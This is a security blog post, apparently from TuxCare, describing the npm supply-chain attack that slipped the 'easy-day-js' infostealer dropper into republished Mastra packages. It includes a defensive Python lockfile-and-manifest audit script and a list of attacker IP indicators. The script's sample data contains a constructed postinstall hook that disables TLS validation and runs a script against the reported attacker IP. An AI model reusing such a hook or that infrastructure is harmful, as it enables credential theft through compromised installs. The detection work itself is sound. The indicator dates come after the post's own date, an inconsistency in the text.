Why the Mastra easy-day-js Attack Should Change How Teams Trust npm Packages

2026-06-18 Tuxcare

https://tuxcare.com/blog/mastra-npm-attack/


A hijacked npm maintainer account republished more than 140 Mastra packages with one added dependency on the typosquatted `easy-day-js` package, leaving Mastra's own library code unchanged while moving malware one dependency hop away. The malicious `easy-day-js` release ran a `postinstall` hook that disabled TLS validation, fetched a second-stage payload from attacker infrastructure, launched it as a detached Node process, and deleted the dropper. The second stage is described as a cross-platform infostealer targeting browser data, cryptocurrency wallet extensions, and credentials likely present on AI-agent build hosts. TuxCare notes the activity resembles prior Sapphire Sleet-linked npm tradecraft but says attribution for this incident is not confirmed.
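The attack chain above (one quietly added dependency, an install-time lifecycle hook, TLS validation switched off, a fetch from raw-IP infrastructure) maps onto checks a team can run over its own lockfile and installed manifests before trusting a fresh `npm install`. The script below is an added defensive example, not TuxCare's or Mastra's code. It audits a package-lock.json (lockfileVersion 2/3 `packages` map) and a set of package.json manifests, and diffs two lockfiles to surface newly added packages. The lockfile, manifests, and the package names `some-ai-framework` and `vendored-helper` are constructed for illustration; only the `easy-day-js` name and the two IPs come from the report.

```python
"""Defensive audit for the npm dependency patterns described in the
Mastra / easy-day-js write-up. Added example; sample data is constructed."""
import re
from typing import Dict, List

# Indicators quoted in the report (the only page-specific values used here).
WATCHLIST_PACKAGES = {"easy-day-js"}
WATCHLIST_IPS = {"23.254.164.92", "23.254.164.123"}
TRUSTED_REGISTRY = "https://registry.npmjs.org/"

INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Two habits of the malicious postinstall: TLS validation disabled, raw-IP download host.
TLS_DISABLE_RE = re.compile(
    r"NODE_TLS_REJECT_UNAUTHORIZED\s*=\s*['\"]?0|rejectUnauthorized\s*:\s*false"
)
RAW_IP_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?")


def audit_lockfile(lock: dict) -> List[dict]:
    """Flag watchlisted names, off-registry tarballs and install scripts in a lockfile."""
    findings = []
    for path, entry in lock.get("packages", {}).items():
        if path == "":
            continue  # root project entry
        name = path.rsplit("node_modules/", 1)[-1]  # handles scoped and nested paths
        if name in WATCHLIST_PACKAGES:
            findings.append({"package": name, "rule": "watchlist-package"})
        resolved = entry.get("resolved", "")
        if resolved and not resolved.startswith(TRUSTED_REGISTRY):
            findings.append({"package": name, "rule": "off-registry-source", "detail": resolved})
        if entry.get("hasInstallScript"):  # npm records this for packages with lifecycle hooks
            findings.append({"package": name, "rule": "install-script"})
    return findings


def audit_manifest(name: str, manifest: dict) -> List[dict]:
    """Flag install-time lifecycle hooks in a package.json and what they invoke."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        findings.append({"package": name, "rule": "lifecycle-hook", "detail": f"{hook}: {cmd}"})
        if TLS_DISABLE_RE.search(cmd):
            findings.append({"package": name, "rule": "tls-validation-disabled", "detail": hook})
        for m in RAW_IP_URL_RE.finditer(cmd):
            rule = "known-c2-ip" if m.group(1) in WATCHLIST_IPS else "raw-ip-url"
            findings.append({"package": name, "rule": rule, "detail": m.group(0)})
    return findings


def new_packages(old_lock: dict, new_lock: dict) -> List[str]:
    """Packages in the new lockfile that were absent from the old one: the single
    added hop the republished Mastra packages introduced is exactly this kind of diff."""
    old = set(old_lock.get("packages", {}))
    return sorted(p for p in new_lock.get("packages", {}) if p and p not in old)


# Constructed sample data (hypothetical package names, not real Mastra packages).
SAMPLE_LOCK_BEFORE = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "agent-build"},
        "node_modules/some-ai-framework": {
            "version": "1.2.2",
            "resolved": TRUSTED_REGISTRY + "some-ai-framework/-/some-ai-framework-1.2.2.tgz",
        },
        "node_modules/vendored-helper": {
            "version": "0.1.0",
            "resolved": "https://artifacts.example.internal/vendored-helper-0.1.0.tgz",
        },
    },
}
SAMPLE_LOCK_AFTER = {
    "lockfileVersion": 3,
    "packages": {
        **SAMPLE_LOCK_BEFORE["packages"],
        "node_modules/some-ai-framework": {
            "version": "1.2.3",
            "resolved": TRUSTED_REGISTRY + "some-ai-framework/-/some-ai-framework-1.2.3.tgz",
            "dependencies": {"easy-day-js": "^1.0.0"},
        },
        "node_modules/easy-day-js": {
            "version": "1.0.0",
            "resolved": TRUSTED_REGISTRY + "easy-day-js/-/easy-day-js-1.0.0.tgz",
            "hasInstallScript": True,
        },
    },
}
SAMPLE_MANIFESTS: Dict[str, dict] = {
    "some-ai-framework": {"scripts": {"build": "tsc", "test": "vitest"}},
    # Constructed hook mimicking only the reported traits the detector looks for.
    "easy-day-js": {"scripts": {"postinstall": "NODE_TLS_REJECT_UNAUTHORIZED=0 node setup.js https://23.254.164.92:8000/"}},
}


def run_audit(lock: dict = SAMPLE_LOCK_AFTER, manifests: Dict[str, dict] = SAMPLE_MANIFESTS) -> List[dict]:
    findings = audit_lockfile(lock)
    for name, manifest in manifests.items():
        findings.extend(audit_manifest(name, manifest))
    return findings


if __name__ == "__main__":
    print("added since last lock:", new_packages(SAMPLE_LOCK_BEFORE, SAMPLE_LOCK_AFTER))
    for finding in run_audit():
        print(finding)
```

In practice the lockfile diff is the cheapest control: a version bump of a library you already use should not add a dependency you have never reviewed, and `hasInstallScript` on that new dependency is the signal to inspect its manifest before the install is allowed to run hooks (or to install with `--ignore-scripts` in CI until it has been reviewed).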

Indicators of Compromise

Type   Value                               First Seen   Last Seen
URL    https://23.254.164.92:8000/upda…    2026-06-20   2026-06-20
IPv4   23.254.164.123                      2026-06-20   2026-06-20
IPv4   23.254.164.92                       2026-06-20   2026-06-20
